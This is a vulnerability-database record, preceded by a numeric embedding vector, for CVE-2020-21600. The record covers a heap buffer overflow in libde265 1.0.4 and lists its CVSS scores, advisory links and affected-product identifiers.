0.013901171274483204, 0.005445742513984442, -0.004805067088454962, 0.009267447516322136, -0.010757390409708023, 0.0033765840344130993, 0.014407752081751823, -0.034954071044921875, 0.015763599425554276, -0.009245098568499088, -0.007390118669718504, 0.016568168997764587, 0.010980881750583649, 0.029485978186130524, -0.006425380241125822, 0.047737784683704376, 0.0025962262880057096, -0.012351630255579948, 0.011345918290317059, 0.004175566136837006, -0.009803826920688152, -0.00885771308094263, -0.013379691168665886, 0.00713310344144702, -0.00364291132427752, 0.012143038213253021, 0.013275395147502422, -0.0030487964395433664, -0.017417436465620995, 0.010682892985641956, 0.014698290266096592, 0.011740753427147865, -0.01380432490259409, 0.01375962607562542, 0.00803824421018362, -0.005333996843546629, 0.011696054600179195, 0.01242612674832344, 0.011643907055258751, 0.004741744603961706, 0.014564195647835732, 0.007103304844349623, -0.005427118390798569, 0.0033523724414408207, 0.005631985608488321, 0.004238888621330261, -0.023630499839782715, 0.01329774409532547, 0.025254538282752037, -0.0018940904410555959, -0.015137824229896069, 0.011226722970604897, -0.009662282653152943, 0.00498013524338603, -0.010995781049132347, -0.005754905752837658, -0.012083440087735653, -0.010273158550262451, -0.019756648689508438, -0.01064564473927021, 0.009267447516322136, -0.010399804450571537, -0.0007999133085832, 0.0014145149616524577, -0.007397568318992853, -0.023973187431693077, -0.00564688490703702, 0.004294761456549168, -0.0029836115427315235, 0.0005000621895305812, 0.017164146527647972, -0.006931961048394442, 0.012880560010671616, 0.004987585358321667, -0.0015141548356041312, -0.03498386964201927, -0.008015895262360573, 0.010682892985641956, 0.0034268696326762438, 0.00987087469547987, 0.021142294630408287, -0.009662282653152943, -0.004223989322781563, 0.014772787690162659, -0.003445493755862117, 0.0076955570839345455, 0.004708220716565847, 0.001961137866601348, 0.020427122712135315, -0.003600075375288725, 0.015763599425554276, -0.008768316358327866, -0.010042217560112476, -0.007017632946372032, -0.0015132236294448376, 0.0123441806063056, 0.009625033475458622, -0.005583562422543764, 0.028219526633620262, 0.008917310275137424, -0.016404274851083755, 0.004060095641762018, 0.013051902875304222, -0.025448231026530266, 0.005635710433125496, 0.009259997867047787, -0.015108024701476097, -0.0219468642026186, -0.01746213622391224, -0.009736779145896435, 0.009416441433131695, 0.03242116421461105, 0.02212565764784813, -0.01525701954960823, -0.000025011840989463963, -0.008380930870771408, 0.0173578392714262, -0.0164340753108263, 0.005125404801219702, -0.003989323042333126, 0.040526457130908966, -0.0009274897165596485, -0.009401542134582996, -0.02027812786400318, 0.005274399183690548, 0.014668491668999195, -0.01558480691164732, 0.02357090264558792, -0.013402040116488934, 0.023183517158031464, -0.014184259809553623, 0.012329280376434326, -0.0027079719584435225, -0.00904395617544651, 0.012403777800500393, -0.008574623614549637, -0.012277132831513882, 0.007408742792904377, -0.011822699569165707, -0.019950341433286667, 0.0038589530158787966, 0.012739014811813831, 0.02111249603331089, 0.027012672275304794, 0.005751180928200483, -0.009811276569962502, 0.00498013524338603, -0.01311895065009594, -0.01279116328805685, -0.004380433354526758, -0.005736281629651785, 0.000394834962207824, 0.02713186666369438, -0.0003769090981222689, 0.004108518827706575, -0.011509811505675316, 0.007267198525369167, -0.010809538885951042, 0.008485226891934872, -0.0013949593994766474, 0.01637447625398636, -0.0016761862207204103, -0.01616588421165943, 0.013990567065775394, 0.03254036232829094, 0.005728831980377436, -0.00400049751624465, 0.0005061150877736509, 0.009714430198073387, -0.011755652725696564, 0.002307549584656954, -0.0036671229172497988, -0.00936429388821125, 0.0029687120113521814, 0.0007361251045949757, 0.0012683141976594925, -0.01817730814218521, -0.007308172062039375, 0.007438541855663061, -0.010206111706793308, 0.0017879318911582232, -0.021410485729575157, -0.027087168768048286, -0.007799853105098009, 0.025641923770308495, 0.0164638739079237, -0.009200399741530418, 0.004622549284249544, 0.006343433633446693, 0.0018289054278284311, -0.015704002231359482, 0.007986095733940601, -0.03781476244330406, 0.013171099126338959, 0.005408494267612696, -0.003940899856388569, -0.009774028323590755, 0.015689102932810783, 0.025716420263051987, -0.008284084498882294, 0.010355105623602867, -0.005717657506465912, -0.018788184970617294, -0.029918061569333076, -0.00854482501745224, -0.020501619204878807, 0.004868389572948217, -0.0187434870749712, -0.0021026823669672012, -0.00791159924119711, 0.017059851437807083, -0.00368947209790349, -0.010399804450571537, -0.004942886997014284, -0.015189971774816513, -0.011778001673519611, -0.0008730136323720217, -0.015018627978861332, -0.019339464604854584, 0.027921536937355995, -0.011249071918427944, -0.017789922654628754, 0.012068540789186954, 0.005546313710510731, 0.008164889179170132, -0.016508571803569794, 0.024807555601000786, 0.00818723812699318, -0.0033430601470172405, -0.022870630025863647, -0.0027508079074323177, 0.007799853105098009, -0.009937921538949013, 0.0015346416039392352, 0.03900671377778053, 0.008440528996288776, 0.007021357771009207, -0.010422153398394585, -0.011681155301630497, -0.004320835694670677, 0.005963497795164585, 0.014281106181442738, 0.011964244768023491, -0.02842811867594719, -0.012396328151226044, -0.01828160509467125, -0.017953816801309586, 0.0018745348788797855, -0.012522973120212555, -0.000895362813025713, 0.0014843560056760907, 0.0007091198931448162, 0.0011733303545042872, 0.027444755658507347, 0.000323829852277413, 0.0021455183159559965, 0.0004223058058414608, -0.008954559452831745, -0.027087168768048286, 0.019160671159625053, 0.016448974609375, 0.004376708529889584, -0.022170355543494225, -0.008813014253973961, -0.0025813267566263676, 0.004544327035546303, 0.014996279031038284, 0.005617086309939623, 0.0019127146806567907, 0.006354608107358217, -0.017953816801309586, 0.0030227224342525005, 0.002907251939177513, 0.03671220317482948, 0.029962759464979172, -0.004816241562366486, 0.00427241250872612, 0.00745344115421176, 0.02018873207271099, -0.005147754214704037, 0.013096601702272892, -0.0012580708134919405, 0.003186616115272045, 0.020889004692435265, 0.012522973120212555, 0.033493924885988235, -0.011554510332643986, -0.0037509321700781584, -0.010951083153486252, 0.014593994244933128, 0.01013906393200159, 0.0023596975952386856, -0.01356593333184719, -0.009408991783857346, 0.02412218227982521, 0.0005983053706586361, -0.012515523470938206, -0.013402040116488934, -0.011234172619879246, 0.01993544213473797, 0.03608642518520355, 0.005386144854128361, 0.009625033475458622, -0.004667247179895639, 0.009677181951701641, -0.00887261237949133, 0.008813014253973961, -0.00873106811195612, -0.015122924000024796, -0.0032983620185405016, -0.0024937926791608334, 0.008239386603236198, 0.0075763617642223835, 0.016881057992577553, -0.03626522049307823, 0.005114230327308178, 0.0015821335837244987, 0.008619321510195732, -0.008783215656876564, -0.019697049632668495, -0.015435812063515186, -0.013327542692422867, 0.012888009659945965, -0.019324565306305885, -0.02202136255800724, -0.018236905336380005, 0.010347655974328518, -0.0020430847071111202, 0.010116714984178543, -0.003963249269872904, 0.019682150334119797, 0.011062828823924065, -0.01635957695543766, 0.00009783572750166059, -0.03364291787147522, -0.011353367939591408, -0.015704002231359482, 0.00817978847771883, 0.016285080462694168, -0.026818979531526566, -0.00932704471051693, -0.012038742192089558, 0.008403279818594456, -0.00854482501745224, -0.01545071229338646, -0.013133849948644638, -0.03677180036902428, -0.016881057992577553, 0.00007531197479693219, -0.0040451958775520325, -0.000541966874152422, -0.01545071229338646, 0.006689845584332943, -0.005728831980377436, 0.00010912670404650271, -0.00873106811195612, -0.0053004734218120575, -0.02340700849890709, -0.009066305123269558, -0.010213561356067657, -0.006648872047662735, -0.015569907613098621, -0.027459654957056046, -0.003125156043097377, 0.004879564046859741, -0.01375962607562542, 0.0025291787460446358, 0.004391607828438282, 0.02339210920035839, -0.006693570408970118, -0.013148749247193336, -0.027832141146063805, 0.015525208786129951, -0.00853737536817789, 0.030096855014562607, 0.009431340731680393, -0.0014024091651663184, -0.011725854128599167, -0.009394092485308647, -0.025433331727981567, -0.007084680255502462, -0.012128137983381748, -0.009699530899524689, -0.004976410418748856, -0.00885771308094263, -0.01426620688289404, 0.0007901355274952948, 0.027623549103736877, -0.0027619823813438416, -0.007431092206388712, 0.01993544213473797, 0.0018251804867759347, -0.025716420263051987, -0.018430598080158234, 0.01883288286626339, -0.016329778358340263, -0.008097841404378414, 0.013990567065775394, -0.029009195044636726, -0.0127986129373312, 0.009356844238936901, 0.009669732302427292, 0.003294637193903327, -0.01701515167951584, -0.006365782581269741, -0.024986349046230316, -0.009595234878361225, -0.026908375322818756, 0.007051156833767891, 0.0013716790126636624, 0.020993301644921303, -0.007103304844349623, 0.006514776963740587, 0.0075353882275521755, 0.002732183551415801, -0.011442764662206173, -0.004853490274399519, 0.010749940760433674, -0.002722871256992221, 0.027191465720534325, 0.00646635377779603, -0.01680655963718891, -0.02897939644753933, 0.00917805079370737, -0.008932209573686123, 0.003514403710141778, 0.003382171271368861, -0.001140737789683044, 0.02246834523975849, 0.0029891987796872854, -0.014102313667535782, 0.015569907613098621, -0.023645399138331413, -0.03143780305981636, -0.004142042249441147, -0.011450214311480522, 0.026357097551226616, 0.006417930591851473, -0.009423891082406044, -0.0013688853941857815, 0.009982620365917683, -0.006514776963740587, 0.0053377216681838036, -0.000058346413425169885, 0.022825932130217552, -0.010392354801297188, -0.022185254842042923, -0.014534397050738335, -0.014683390967547894, 0.03647381067276001, 0.0071740769781172276, 0.002355972770601511, -0.01110007707029581, -0.021350886672735214, -0.0024602687917649746, 0.0015206733951345086, 0.0005256705917418003, -0.016285080462694168, 0.021246591582894325, -0.018430598080158234, -0.020039737224578857, -0.003836604068055749, 0.013916070573031902, -0.0066265226341784, 0.027578851208090782, 0.011129876598715782, 0.00212689395993948, 0.0012264095712453127, 0.020814508199691772, 0.032301969826221466, -0.015018627978861332, 0.022527942433953285, 0.01293270755559206, -0.014191709458827972, -0.02155947871506214, -0.011427865363657475, -0.0017721012700349092, 0.03975168615579605, 0.00004513480598689057, -0.0014387264382094145, -0.013275395147502422, -0.0013837848091498017, 0.019175570458173752, 0.014810035936534405, -0.016672465950250626, -0.016955554485321045, -0.01329774409532547, 0.009446240030229092, 0.015942392870783806, -0.008984358049929142, -0.004648623056709766, -0.001522535807453096, -0.003907376434653997, 0.0020225979387760162, 0.0039260005578398705, -0.031944382935762405, -0.00705860648304224, -0.01064564473927021, 0.00048236912698484957, -0.030782228335738182, -0.017983615398406982, -0.02732555940747261, -0.0016389376251026988, 0.0010718279518187046, -0.019264966249465942, -0.01792401820421219, 0.000014506576917483471, -0.006809040904045105, 0.03644401207566261, -0.041003238409757614, -0.006499877665191889, 0.005535139236599207, 0.010951083153486252, 0.017328040674328804, 0.009841075167059898, -0.0007021357887424529, 0.003870127722620964, -0.013975667767226696, -0.011539611034095287, 0.00411224365234375, -0.01635957695543766, 0.00008439132216153666, 0.021082697436213493, -0.011390616185963154, -0.018445497378706932, 0.018073011189699173, -0.002572014695033431, -0.03388131037354469, 0.00013130124716553837, -0.012813512235879898, -0.028577111661434174, 0.012783713638782501, -0.01297740638256073, -0.0027489452622830868, -0.006444004829972982, -0.00664514722302556, -0.006935685873031616, -0.01707475073635578, 0.03227217122912407, -0.002853241516277194, 0.009915572591125965, 0.0019462384516373277, -0.007941397838294506, 0.014631243422627449, -0.009408991783857346, -0.007483240216970444, 0.005382420029491186, 0.01129376981407404, -0.020173832774162292, -0.00001572879591549281, -0.006164640188217163, -0.00411224365234375, -0.013476536609232426, 0.01046685129404068, 0.01680655963718891, 0.02157437801361084, 0.0028606911655515432, 0.0024062583688646555, -0.017521733418107033, -0.0008399555226787925, -0.005240875296294689, 0.003419419750571251, 0.0070139081217348576, -0.003423144808039069, -0.003253663657233119, -0.02100820094347, 0.00557238794863224, -0.0072746481746435165, 0.014541846700012684, 0.02211075834929943, -0.014921781606972218, -0.002445369493216276, -0.010638195089995861, 0.018028313294053078, 0.010727591812610626, -0.018132610246539116, 0.015763599425554276, -0.0146237937733531, 0.031288810074329376, 0.005449467804282904, 0.00229637511074543, -0.018132610246539116, 0.004887014161795378, -0.003238764125853777, -0.02742985635995865, -0.010727591812610626, -0.008336232975125313, -0.0042463382706046104, 0.00009469287761021405, -0.0010085053509101272, 0.0056804087944328785, 0.01493668183684349, -0.006134841591119766, 0.002290787873789668, 0.007568912114948034, 0.003294637193903327, 0.017879320308566093, -0.013491436839103699, -0.01591259427368641, 0.00006367179594235495, -0.01899677701294422, -0.00950583815574646, 0.002082195831462741, -0.021917065605521202, 0.0024528191424906254, -0.00523342564702034, -0.00012780919496435672, -0.0030432092025876045, 0.018624290823936462, 0.010906385257840157, 0.002825304865837097, -0.020546317100524902, -0.008649121038615704, 0.005348896607756615, 0.01929476484656334, -0.012522973120212555, 0.020054636523127556, 0.020784709602594376, 0.012724115513265133, 0.00018310005543753505, 0.019905641674995422, -0.004950336646288633, -0.00887261237949133, -0.027280861511826515, -0.002335486002266407, 0.004596475046128035, -0.001282282406464219, 0.016687365248799324, 0.002912839176133275, 0.020054636523127556, -0.004399057477712631, 0.002087783068418503, -0.013968218117952347, -0.02476285770535469, 0.003333748085424304, 0.011904646642506123, -0.0033449227921664715, -0.009945371188223362, -0.012351630255579948, 0.010116714984178543, 0.003993047866970301, 0.010049667209386826, -0.004950336646288633, -0.010042217560112476, -0.008090391755104065, 0.008373481221497059, 0.0021771795582026243, -0.012917808257043362, 0.011800350621342659, -0.0012766951695084572, 0.0004597871738951653, 0.012962507084012032, 0.01457164529711008, -0.00016226414300035685, 0.0075353882275521755, -0.0054010446183383465, 0.015793398022651672, -0.007397568318992853, -0.018251804634928703, -0.0024137080181390047, -0.0019797622226178646, 0.025612125173211098, -0.000523808179423213, -0.013312643393874168, 0.00310653168708086, -0.0063024600967764854, -0.0003412901423871517, -0.004484729375690222, 0.009565436281263828, 0.005207351874560118, 0.013066803105175495, 0.04216539487242699, 0.013871371746063232, 0.005404769442975521, -0.026282599195837975, 0.013424389064311981, -0.0007757017156109214, -0.010921284556388855, -0.009528187103569508, -0.008477777242660522, 0.002141793491318822, 0.0029370507691055536, 0.008492676541209221, -0.021321088075637817, 0.005970947910100222, 0.005672959145158529, 0.004168116487562656, -0.001060653361491859, 0.00008852358587319031, 0.0005885275895707309, 0.002348523121327162, 0.015972191467881203, 0.01580829918384552, -0.024256275966763496, -0.0093717435374856, -0.007479515392333269, -0.004715670365840197, 0.0038254293613135815, 0.013178548775613308, -0.035132862627506256, -0.00035386154195293784, 0.010630745440721512, 0.027027571573853493, -0.028860202059149742, 0.006667496170848608, 0.038887519389390945, -0.024345673620700836, -0.031050417572259903, -0.010042217560112476, -0.006425380241125822, 0.0055984617210924625, -0.006890987511724234, 0.010742491111159325, -0.009200399741530418, 0.01443755067884922, -0.004034021403640509, 0.010019868612289429, 0.008656570687890053, 0.010250809602439404, 0.00853737536817789, -0.0044065071269869804, -0.021365785971283913, 0.00287931552156806, 0.00850757583975792, -0.014325805008411407, 0.007345420308411121, -0.011025580577552319, 0.018058111891150475, 0.0027414956130087376, 0.012180286459624767, -0.027355358004570007, -0.007852001115679741, -0.0028271672781556845, -0.013394590467214584, -0.006514776963740587, 0.0019574130419641733, 0.011062828823924065, 0.007762604393064976, -0.004115968476980925, -0.02139558643102646, -0.004231438972055912, 0.013543584384024143, -0.0017125036101788282, -0.007002733647823334, 0.0059597729705274105, -0.009304695762693882, 0.0021119946613907814, -0.0011295631993561983, 0.006607898510992527, 0.02686367742717266, 0.0022535391617566347, -0.011412966065108776, -0.017298242077231407, -0.04148001968860626, 0.007326796185225248, 0.018803084269165993, -0.0077775041572749615, -0.012634718790650368, -0.00443258136510849, -0.022885529324412346, 0.008112741634249687, 0.017581330612301826, -0.016836360096931458, -0.006157190538942814, 0.01357338298112154, 0.0008250561077147722, -0.01771542616188526, 0.005523964762687683, 0.0009973307605832815, 0.025895213708281517, 0.014005467295646667, -0.029187988489866257, 0.004507078323513269, 0.0023894966579973698, -0.004313386045396328, -0.004171841312199831, -0.01799851469695568, 0.015435812063515186, 0.020248329266905785, 0.0012366529554128647, -0.004909363109618425, -0.007002733647823334, -0.04133102670311928, 0.01781972125172615, -0.005229700822383165, 0.00047910987632349133, -0.008470327593386173, -0.004652347881346941, 0.021604178473353386, 0.0032964996062219143, 0.012031291611492634, 0.007438541855663061, 0.00905140582472086, -0.026833878830075264, -0.005944873671978712, -0.0023410734720528126, 0.014504597522318363, 0.0219319649040699, -0.025433331727981567, -0.008596972562372684, -0.0042053647339344025, -0.00790414959192276, 0.0246883612126112, 0.002726596314460039, 0.0029016644693911076, -0.008380930870771408, -0.012575121596455574, -0.006231687963008881, -0.015644405037164688, -0.00931959506124258, -0.015689102932810783, 0.0009228336275555193, -0.014310905709862709, 0.00855227466672659, 0.006019371096044779, -0.008894961327314377, -0.02476285770535469, 0.005591012071818113, 0.013632981106638908, -0.016225483268499374, 0.009423891082406044, -0.0003112584527116269, 0.006980384234338999, -0.0026409244164824486, -0.009349394589662552, -0.0036391864996403456, 0.012649618089199066, 0.0028010932728648186, -0.017670728266239166, -0.01110007707029581, -0.022602438926696777, 0.0023205867037177086, -0.028040733188390732, -0.0013167373836040497, -0.00671964418143034, 0.021067798137664795, 0.003434319281950593, 0.012277132831513882, 0.01983114518225193, 0.019354363903403282, -0.006514776963740587, -0.001783275860361755, 0.008082942105829716, 0.010221011005342007, -0.010437052696943283, 0.0020915078930556774, 0.010928734205663204, -0.011368267238140106, 0.0058592017740011215, 0.0121057890355587, 0.019592754542827606, 0.018966978415846825, -0.0005931836785748601, -0.0006695432821288705, -0.0035870384890586138, -0.007837101817131042, -0.003661535680294037, 0.009446240030229092, 0.008596972562372684, 0.003540477715432644, 0.01558480691164732, 0.016389375552535057, 0.008991807699203491, -0.0016221757978200912, 0.007181526627391577, 0.013983117416501045, -0.0034045204520225525, 0.0016082075890153646, 0.006164640188217163, 0.013692579232156277, 0.012671967968344688, 0.004183015786111355, -0.012545322068035603, 0.02339210920035839, 0.02495655044913292, -0.01215793751180172, 0.01719394512474537, -0.01326049491763115, -0.00904395617544651, 0.015793398022651672, -0.028919799253344536, 0.010444502346217632, 0.018236905336380005, 0.007196425925940275, -0.0004337131686042994, -0.017521733418107033, -0.005948598496615887, 0.008053143508732319, 0.00785945076495409, -0.03033524565398693, -0.0080009950324893, -0.014847285114228725, 0.0009503044420853257, -0.013811774551868439, -0.006846289616078138, -0.009230198338627815, -0.01582319848239422, -0.0015104300109669566, -0.00589272566139698, -0.0023690098896622658, -0.024330774322152138, 0.02586541511118412, 0.015748700127005577, -0.0036596732679754496, 0.02100820094347, 0.02212565764784813, -0.020635714754462242, 0.021335987374186516, -0.008164889179170132, 0.022915327921509743, -0.0026800355408340693, -0.022647138684988022, -0.007732805795967579, 0.014094863086938858, -0.020352626219391823, 0.00007583578553749248, 0.005397319793701172, -0.013469086959958076, 0.004644898232072592, 0.014296005479991436, -0.0027768819127231836, 0.011629007756710052, -0.0030711456201970577, -0.025343935936689377, 0.011621558107435703, 0.002283337991684675, 0.006619072984904051, 0.0037509321700781584, 0.01801341399550438, -0.010340206325054169, 0.006667496170848608, -0.0018875718815252185, 0.006112492177635431, -0.002484480384737253, 0.024554265663027763, -0.007002733647823334, -0.010064566507935524, -0.017581330612301826, -0.005017383955419064, -0.003784456057474017, 0.024718159809708595, -0.0008590454235672951, 0.021335987374186516, -0.01637447625398636, -0.008090391755104065, 0.0030953572131693363, 0.014824936166405678, -0.01013906393200159, -0.01781972125172615, 0.008567173965275288, -0.015599706210196018, 0.009245098568499088, 0.00031056004809215665, 0.004872114397585392, -0.006157190538942814, -0.008246836252510548, -0.025165142491459846, 0.003167991992086172, -0.0004833003622479737, 0.014750438742339611, 0.0017655828269198537, 0.030484240502119064, 0.01890738122165203, 0.010712692514061928, -0.015048427507281303, -0.0007626647129654884, -0.005635710433125496, -0.006738268304616213, -0.00823193695396185, -0.025388633832335472, -0.009341944009065628, 0.019622553139925003, 0.0164638739079237, 0.013379691168665886, 0.031288810074329376, -0.012195185758173466, -0.0068947128020226955, -0.014981379732489586, -0.010422153398394585, -0.009662282653152943, 0.00964738242328167, 0.0010196799412369728, -0.004574126098304987, -0.016523471102118492, 0.012820961885154247, -0.0026502367109060287, -0.017983615398406982, 0.007852001115679741, 0.0037304454017430544, -0.0020337726455181837, 0.03489447012543678, 0.027072269469499588, 0.003937175031751394, 0.02185746841132641, -0.0009074686095118523, -0.007963746786117554, 0.0035497897770255804, 0.003480880055576563, 0.0150782261043787, 0.016314879059791565, 0.009587785229086876, -0.008894961327314377, -0.010288058780133724, 0.009788927622139454, 0.018028313294053078, 0.006071519106626511, 0.01920536905527115, 0.0034361816942691803, -0.013722377829253674, 0.011859948746860027, 0.005997021682560444, 0.016493672505021095, -0.004011672455817461, -0.007077230606228113, -0.005103055853396654, -0.013655330054461956, 0.006976659409701824, 0.03131860867142677, -0.00821703765541315, -0.00882046390324831, -0.01046685129404068, -0.0029407755937427282, -0.011725854128599167, -0.02768314629793167, 0.006753168068826199, -0.008991807699203491, -0.012739014811813831, 0.005553763825446367, -0.0025533903390169144, 0.004160666838288307, 0.007207600865513086, -0.002035635057836771, -0.009759128093719482, 0.017760124057531357, 0.0196374524384737, -0.01708965003490448, -0.0022609890438616276, 0.007405017968267202, -0.029575373977422714, -0.016106287017464638, 0.023839091882109642, 0.0006462628953158855, 0.0019061962375417352, -0.011033030226826668, 0.005304198246449232, -0.010235910303890705, 0.012888009659945965, -0.024435069411993027, 0.019890742376446724, -0.019086172804236412, -0.011137326247990131, -0.01929476484656334, -0.023421907797455788, -0.019041474908590317, 0.006056619342416525, 0.010101815685629845, 0.006730818655341864, -0.024822454899549484, 0.0024192954879254103, 0.0076173353008925915, -0.004812516737729311, 0.022974925115704536, -0.015867896378040314, -0.005050907842814922, 0.009237647987902164, -0.034119702875614166, -0.0050397333689033985, 0.014556745998561382, 0.02111249603331089, -0.003201515646651387, 0.024077484384179115, -0.006257761735469103, 0.0030748704448342323, -0.01755153201520443, 0.0010355105623602867, 0.009058855473995209, 0.0018940904410555959, 0.030365044251084328, -0.015674203634262085, 0.00036829535383731127, 0.005516515113413334, 0.012061091139912605, 0.009096103720366955, -0.0023783219512552023, 0.0055798375979065895, 0.014683390967547894, 0.01525701954960823, 0.011196923442184925, -0.019354363903403282, -0.006313634570688009, -0.013640430755913258, 0.0076955570839345455, 0.010057116858661175, -0.008485226891934872, 0.008105291053652763, -0.0055798375979065895, 0.02348150685429573, -0.0017171596409752965, 0.005751180928200483, 0.013104051351547241, 0.011189473792910576, 0.004648623056709766, -0.0010904521914198995, -0.003937175031751394, 0.013908620923757553, -0.020516518503427505, -0.0014415201731026173, -0.023556003347039223, -0.0057400064542889595, -0.02979886531829834, -0.020695311948657036, 0.0037174085155129433, -0.0038179797120392323, -0.010794639587402344, -0.0009246960398741066, 0.00835858192294836, -0.015115474350750446, 0.015391114167869091, -0.0028197176288813353, 0.01710454933345318, -0.003408245276659727, -0.020456921309232712, 0.007162902504205704, 0.020129133015871048, 0.02905389480292797, 0.026535889133810997, -0.0027750192675739527, -0.007043706718832254, -0.022989824414253235, -0.01275391411036253, 0.017879320308566093, -0.014363053254783154, -0.006533401552587748, 0.00697293458506465, -0.021902166306972504, -0.01554010808467865, 0.00534517178311944, 0.017894219607114792, 0.011994043365120888, 0.003501366823911667, 0.002536628395318985, 0.008075492456555367, 0.001824249280616641, 0.020069535821676254, 0.007349145133048296, 0.01457909494638443, -0.02447976917028427, 0.019413961097598076, -0.001398684224113822, -0.011301219463348389, -0.01019121240824461, 0.05202881991863251, -0.005792154464870691, 0.014027816243469715, 0.0219468642026186, 0.00484604062512517, 0.017775023356080055, -0.013714928179979324, 0.0007375219138339162, -0.0015337103977799416, 0.01147256325930357, 0.0027731568552553654, -0.00019951272406615317, 0.015055877156555653, -0.00278619397431612, -0.012396328151226044, 0.008202137425541878, 0.008880062028765678, 0.0008534581284038723, -0.005415943916887045, -0.02185746841132641, -0.012411227449774742, -0.01129376981407404, 0.014377952553331852, -0.013901171274483204, 0.00441395677626133, 0.002806680742651224, -0.010869136080145836, -0.0029612623620778322, 0.0017395088216289878, -0.015614605508744717, 0.04505588486790657, -0.018415698781609535, -0.0038328790105879307, -0.00196672510355711, -0.00853737536817789, 0.022274652495980263, 0.00607896875590086, 0.02139558643102646, -0.006369507405906916, -0.010660544037818909, 0.011055379174649715, 0.0011630869703367352, -0.002603675937280059, 0.0003412901423871517, 0.011204373091459274, 0.010437052696943283, 0.0002882108965422958, -0.0091333519667387, 0.008135090582072735, 0.00969208125025034, 0.007762604393064976, 0.010019868612289429, -0.008209587074816227, 0.018043212592601776, -0.006909612100571394, -0.0025869139935821295, -0.004346909467130899, -0.021440284326672554, -0.0008595110266469419, -0.005386144854128361, -0.0029482252430170774, -0.022349148988723755, -0.01457164529711008, -0.004648623056709766, -0.030216049402952194, 0.0057213823311030865, -0.00008084106229944155, 0.01082443818449974, 0.001770238857716322, 0.023258015513420105, -0.0005205489578656852, -0.009952820837497711, -0.016955554485321045, 0.0044661047868430614, -0.019756648689508438, -0.027578851208090782, 0.01426620688289404, -0.003581451252102852, 0.01708965003490448, 0.008068042807281017, 0.008947109803557396, -0.006127391941845417, -0.004965235944837332, -0.0009326113504357636, -0.00500620948150754, -0.018937179818749428, -0.004793892614543438, -0.00532654719427228, -0.023347411304712296, 0.009781477972865105, 0.016478773206472397, 0.014526947401463985, -0.015927493572235107, -0.01348398718982935, 0.02147008292376995, -0.00436553405597806, 0.004097343888133764, 0.002041222294792533, 0.002104545012116432, 0.0009898811113089323, 0.0164340753108263, 0.00340638286434114, -0.0347454771399498, -0.0016789798391982913, 0.033762115985155106, -0.01298485603183508, 0.0062205130234360695, -0.0028886275831609964, -0.018132610246539116, 0.008656570687890053, 0.01819220744073391, 0.006287560798227787, -0.018624290823936462, 0.005255775060504675, 0.013454187661409378, 0.006280111148953438, -0.0035851760767400265, 0.01609138771891594, 0.01929476484656334, 0.001770238857716322, -0.009423891082406044, 0.005464367102831602, 0.04061585292220116, 0.0055202399380505085, 0.01726844348013401, -0.014161910861730576, -0.004436306189745665, 0.023734796792268753, 0.0059001753106713295, 0.00548671605065465, 0.004764093551784754, -0.01580829918384552, 0.022632239386439323, 0.005341446492820978, -0.0038328790105879307, 0.01591259427368641, -0.00389620172791183, 0.02523963898420334, 0.0062428624369204044, -0.00417929096147418, 0.008693818934261799, 0.033225733786821365, -0.016493672505021095, 0.0011193199316039681, -0.021246591582894325, 0.01013906393200159, -0.0003648033016361296, 0.02266203798353672, -0.019518256187438965, -0.019771547988057137, -0.0003017135022673756, 0.005341446492820978, 0.00786690041422844, 0.004540602210909128, -0.008954559452831745, 0.02018873207271099, 0.004615099169313908, 0.013215797021985054, 0.0036987841594964266, 0.001145393936894834, -0.008619321510195732, -0.006846289616078138, 0.009617583826184273, 0.006384407170116901, 0.0017795510357245803, 0.0037676941137760878, 0.013767075724899769, -0.01411721296608448, 0.018594492226839066, 0.002488205209374428, -0.010861686430871487, 0.004697046242654324, -0.01554010808467865, -0.0055016158148646355, 0.013722377829253674, 0.006071519106626511, 0.01808791235089302, -0.017968716099858284, 0.005453192628920078, 0.007747705094516277, 0.0009335426148027182, 0.015689102932810783, -0.010496650822460651, 0.01847529597580433, 0.05694563314318657, -0.00443258136510849, -0.010489201173186302, 0.006749443244189024, 0.024151980876922607, 0.01708965003490448, -0.012820961885154247, -0.010101815685629845, 0.016851259395480156, 0.002765707205981016, -0.008023344911634922, 0.026163404807448387, 0.00882791355252266, 0.014877083711326122, 0.04416191950440407, -0.014690840616822243, 0.004190465435385704, -0.03635461628437042, 0.0014024091651663184, 0.018341202288866043 ]
3,041
CVE-2020-21600
2021-09-16T22:15:07.920000
libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_pred_avg_16_fallback function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/243" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/strukturag/libde265/issues/243
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
